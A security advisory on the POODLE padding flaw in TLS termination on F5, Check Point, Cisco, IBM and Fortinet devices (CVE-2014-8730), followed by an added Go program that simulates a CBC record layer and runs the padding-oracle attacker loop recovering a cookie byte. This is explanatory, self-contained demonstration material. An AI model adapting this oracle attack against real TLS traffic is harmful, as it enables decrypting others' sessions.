Check Point, Cisco, IBM, F5, FortiOS: information disclosure via POODLE on TLS
Synthesis of the vulnerability
An attacker positioned as a Man-in-the-Middle can decrypt a TLS session terminated by the affected device, in order to obtain sensitive information.
Vulnerable products: GAiA, CheckPoint IP Appliance, IPSO, CheckPoint Power-1 Appliance, SecurePlatform, CheckPoint Security Appliance, CheckPoint Smart-1, CheckPoint VSX-1, Cisco ACE, ASA, BIG-IP Hardware, TMOS, Fedora, FortiGate, FortiGate Virtual Appliance, FortiOS, DB2 UDB, Domino, Informix Server, Tivoli Directory Server, openSUSE, Solaris, Palo Alto Firewall PA***, PAN-OS, Ubuntu.
Severity of this weakness: 3/4.
Consequences of an attack: data reading.
Hacker's origin: internet client.
Number of vulnerabilities in this bulletin: 2.
Creation date: 09/12/2014.
Revision date: 17/12/2014.
References of this bulletin: 1450666, 1610582, 1647054, 1692906, 1693052, 1693142, bulletinjul2017, CERTFR-2014-AVI-533, CSCus08101, CSCus09311, CVE-2014-8730, CVE-2015-2774, FEDORA-2015-12923, FEDORA-2015-12970, openSUSE-SU-2016:0523-1, sk103683, SOL15882, USN-3571-1, VIGILANCE-VUL-15756.
Description of the vulnerability
The VIGILANCE-VUL-15485 (POODLE) vulnerability originates from the SSLv3 CBC padding scheme: the padding bytes are not covered by the MAC and the receiver checks only the padding-length byte, so a Man-in-the-Middle who replays modified records learns, from whether each record is accepted or rejected, one byte of plaintext per roughly 256 attempts.
The F5 BIG-IP product can be configured to "terminate" SSL/TLS sessions. However, even when TLS is negotiated, this BIG-IP feature still applies the SSLv3 padding rule and does not verify the padding bytes as TLS requires. TLS sessions terminated on the BIG-IP are thus also vulnerable to POODLE (CVE-2014-8730).
The same vulnerability also impacts Check Point, Cisco, IBM and Fortinet products.
An attacker positioned as a Man-in-the-Middle can therefore decrypt a TLS session terminated by the affected device, in order to obtain sensitive information.
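As an added example (this is not F5's code and not part of the Vigil@nce bulletin), the following Go program models the defect described above with a constructed, simplified CBC record layer: AES-CBC with HMAC-SHA256, a fresh IV per record, and no record header or sequence number under the MAC. `paddingLength` implements both the SSLv3 rule (only the length byte is read) and the TLS rule (every padding byte is checked); `recoverLastByteOfBlock` is the POODLE attacker, who copies a ciphertext block over the final all-padding block and, when the receiver applies the SSLv3 rule, learns one plaintext byte from the accept/reject behaviour of about 256 records. The type and function names, the keys and the `session=01234567` cookie are all constructed for the example.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"fmt"
)

// paddingLength: trailing bytes to strip from a non-empty decrypted CBC record.
// strict=true is the TLS 1.0+ rule (every padding byte equals the length byte);
// strict=false is the SSLv3 rule (only the length byte is read), the defect above.
func paddingLength(plain []byte, strict bool) (int, bool) {
	p := int(plain[len(plain)-1])
	if p+1 > len(plain) || (!strict && p >= aes.BlockSize) {
		return 0, false
	}
	for _, b := range plain[len(plain)-1-p : len(plain)-1] {
		if strict && int(b) != p {
			return 0, false
		}
	}
	return p + 1, true
}

func randBytes(n int) []byte {
	b := make([]byte, n)
	rand.Read(b) // crypto/rand does not return errors on supported platforms
	return b
}

// victim is a constructed, simplified CBC record layer: content || HMAC-SHA256
// || padding, AES-CBC with a fresh IV per record, no header in the MAC.
type victim struct {
	blk       cipher.Block
	macKey    []byte
	strictPad bool // which padding rule open enforces
}

func newVictim(strictPad bool) *victim {
	blk, _ := aes.NewCipher(randBytes(16)) // a 16-byte key cannot fail
	return &victim{blk: blk, macKey: randBytes(32), strictPad: strictPad}
}

func (v *victim) mac(content []byte) []byte {
	h := hmac.New(sha256.New, v.macKey)
	h.Write(content)
	return h.Sum(nil)
}

// seal encrypts one record; when len(content)+32 is a multiple of 16 the
// padding is a full block ending in 0x0f, the layout POODLE relies on.
func (v *victim) seal(content []byte) (iv, ct []byte) {
	plain := append(append([]byte{}, content...), v.mac(content)...)
	padLen := aes.BlockSize - len(plain)%aes.BlockSize
	plain = append(plain, bytes.Repeat([]byte{byte(padLen - 1)}, padLen)...)
	iv, ct = randBytes(aes.BlockSize), make([]byte, len(plain))
	cipher.NewCBCEncrypter(v.blk, iv).CryptBlocks(ct, plain)
	return iv, ct
}

// open reports whether a record (a whole number of blocks) has valid padding
// and a valid MAC. This accept/reject bit is all a Man-in-the-Middle observes.
func (v *victim) open(iv, ct []byte) bool {
	plain := make([]byte, len(ct))
	cipher.NewCBCDecrypter(v.blk, iv).CryptBlocks(plain, ct)
	padLen, ok := paddingLength(plain, v.strictPad)
	if !ok || len(plain)-padLen < sha256.Size {
		return false
	}
	content := plain[:len(plain)-padLen-sha256.Size]
	return hmac.Equal(plain[len(content):len(plain)-padLen], v.mac(content))
}

// recoverLastByteOfBlock is the attacker's loop. The victim re-sends the same
// content under fresh IVs (a browser re-sending its cookie); the attacker copies
// ciphertext block i (i < n-1) over the all-padding final block. Acceptance means
// D(C_i)[15] ^ C_{n-2}[15] == 0x0f, hence P_i[15] = C_{i-1}[15] ^ C_{n-2}[15] ^ 0x0f.
func recoverLastByteOfBlock(v *victim, content []byte, i, maxTries int) (byte, int, bool) {
	for try := 1; try <= maxTries; try++ {
		iv, ct := v.seal(content)
		chain := append(append([]byte{}, iv...), ct...) // IV || C_0 || ... || C_{n-1}
		n := len(ct) / aes.BlockSize
		forged := append([]byte{}, ct...)
		copy(forged[(n-1)*aes.BlockSize:], ct[i*aes.BlockSize:(i+1)*aes.BlockSize])
		if v.open(iv, forged) {
			return chain[(i+1)*aes.BlockSize-1] ^ chain[n*aes.BlockSize-1] ^ byte(aes.BlockSize-1), try, true
		}
	}
	return 0, maxTries, false
}

func main() {
	b, tries, ok := recoverLastByteOfBlock(newVictim(false), []byte("session=01234567"), 0, 20000)
	fmt.Printf("SSLv3-style padding check leaked byte %q after %d records (ok=%v)\n", b, tries, ok)
}
```

With the SSLv3 rule (`newVictim(false)`) the loop returns the cookie's last byte after about 256 records on average; the MAC is never the leak, because a record is only accepted when the forged final block happens to decrypt to a valid full padding block, at which point the intact content and MAC verify. With the TLS rule (`newVictim(true)`) the same traffic never produces an accepted record. A TLS 1.0+ stack is required to take the strict branch; the products named in this bulletin did not check the padding bytes, which is what exposes TLS sessions to the attack.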